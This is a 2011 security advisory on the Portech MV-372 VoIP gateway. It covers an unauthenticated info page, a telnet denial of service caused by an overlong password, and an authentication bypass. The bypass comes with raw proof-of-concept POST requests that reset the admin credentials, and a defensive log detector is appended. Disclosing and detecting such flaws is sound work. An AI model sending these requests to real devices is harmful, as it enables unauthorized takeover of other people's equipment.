Portech MV-372 Denial Of Service / Bypass

Published: 04 Jul 2011
Reported by: Zsolt Imre
Type: packetstorm
Source: packetstormsecurity.com

Portech MV-372 Mobile VoIP Gateway Multiple Vulnerabilities

Portech MV-372 Mobile VoIP Multiple Vulnerabilities
  
1. Description  
  
Multiple vulnerabilities have been found in the Portech MV-372 Mobile VoIP Gateway that allow an attacker to compromise the device and/or initiate a denial of service attack against its telnet service.
The 'Device details' section contains information about the affected system. Previous and future versions might also be vulnerable (not tested).
  
The vendor has been notified and is aware of the issue, but from their reply it seems we will have to wait a while for a hotfix/patch.
  
2. Device details  
  
Mobile VoIP2 v9.092  
  
Model Type: MV-372  
Module Description: GSM:850/900/1800/1900MHz (SIM3x0)  
Firmware Version: Mon Sep 6 13:11:30 2010.  
Codec Version: Fri Mar 20 17:13:45 2009.  
Contact Address: 150, Shiang-Shung N.Road., Taichung, Taiwan, R.O.C.  
Tel: 886-4-23058000  
Fax: 886-4-23022596  
E-Mail: [email protected]  
Web Site: http://www.portech.com.tw.  
  
3. Information disclosure  
  
It is possible to access http://<device address>/info.htm without authentication. This page reveals information about the device such as model type, module description, and firmware and codec versions.
  
4. Telnet service remote denial of service vulnerability
  
It is possible to initiate a denial of service attack against the telnet service without authentication by providing a very long password (e.g. more than 5000 characters) at authentication. No valid username is required.
As a result of the attack the telnet service crashes and remains unavailable until the device is restarted.
  
5. Web Administration authentication bypass vulnerability  
  
5.1 Description  
  
An authentication bypass vulnerability exists in the web interface which allows an attacker to modify the configuration of the device without providing a valid username and password.

After a successful authentication we can see that our browser received no cookie(s) from the device. After restarting the browser, deleting all stored information or using private browsing we can still access the administrative pages. When we change our IP address these pages are no longer accessible and we are asked to log in. So, the device stores our IP address and uses it as a session identifier. This is a weakness in itself: just as the application uses HTTP instead of HTTPS for authentication, it also fails to properly validate the user session.

The files with '.htm' extension are responsible for user interaction and for displaying configuration settings, and the application uses CGI to handle requested tasks like configuration, username and password changes.
While the '.htm' pages verify our IP address, the CGI files do not, so calling these files directly with the proper arguments results in the execution of the requested action without any authentication.
  
5.2 Proof of concept  
  
To change the username and password of the device without authentication  
send the following query to the device:  
  
POST http://<device address>/change.cgi HTTP/1.1  
Host: <device address>  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101  
Firefox/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7  
Connection: keep-alive  
Referer: http://192.168.0.100/change.htm  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 50  
  
Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit  
  
The query above changes both the username and the password to admin.
To apply the changes the configuration has to be saved, which can be done with the query below. After executing the query the device restarts and we can log in with the username 'admin' and password 'admin'.
  
POST http://<device address>/save.cgi HTTP/1.1  
Host: <device address>  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101  
Firefox/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7  
Connection: keep-alive  
Referer: http://192.168.0.100/save.htm  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 11  
  
submit=Save  
  
All other CGIs are also vulnerable.  
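The session check described in section 5 lives only in the '.htm' pages, so a direct CGI call leaves a recognisable trace: a POST to a '.cgi' handler from a client that never loaded the matching '.htm' page. The detector below, an added example that is not part of the advisory, runs that rule (plus a flag for the unauthenticated /info.htm page from section 3) over constructed Common Log Format lines, assuming a proxy or IDS in front of the gateway records requests in that format and that each handler's page shares its base name (change.cgi/change.htm, save.cgi/save.htm, as on this page).

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from a real device) in Common Log Format,
# as a proxy or IDS in front of the gateway might record them.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jul/2011:10:00:01 +0200] "GET /login.htm HTTP/1.1" 200 1520
10.0.0.5 - - [04/Jul/2011:10:00:20 +0200] "GET /change.htm HTTP/1.1" 200 2311
10.0.0.5 - - [04/Jul/2011:10:00:35 +0200] "POST /change.cgi HTTP/1.1" 200 512
10.0.0.9 - - [04/Jul/2011:10:05:02 +0200] "GET /info.htm HTTP/1.1" 200 980
10.0.0.9 - - [04/Jul/2011:10:05:10 +0200] "POST /change.cgi HTTP/1.1" 200 512
10.0.0.9 - - [04/Jul/2011:10:05:12 +0200] "POST /save.cgi HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def page_for_cgi(cgi_path):
    # Assumption: each handler's form page shares its base name (change.cgi -> change.htm).
    return cgi_path[: -len(".cgi")] + ".htm"


def find_suspicious(log_text):
    """Return (ip, path, reason) tuples for requests worth alerting on."""
    seen_pages = defaultdict(set)  # client ip -> set of .htm pages it fetched
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method = rec["ip"], rec["method"]
        path = rec["path"].split("?", 1)[0]
        if path == "/info.htm":
            # Section 3: device details readable without authentication.
            findings.append((ip, path, "unauthenticated device info page"))
        if method == "GET" and path.endswith(".htm"):
            seen_pages[ip].add(path)
        if method == "POST" and path.endswith(".cgi"):
            # Section 5: the .cgi handler itself performs no session check,
            # so a POST with no prior matching .htm page from this client
            # is a direct CGI call.
            if page_for_cgi(path) not in seen_pages[ip]:
                findings.append((ip, path, "direct CGI call without prior .htm page"))
    return findings


if __name__ == "__main__":
    for ip, path, reason in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {path}: {reason}")
```

The rule is a heuristic for spotting scripted direct calls in traffic; the actual fix is for the CGI handlers to validate the session server-side rather than relying on the '.htm' pages to do so.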
  
  
Regards,  
Zsolt Imre  
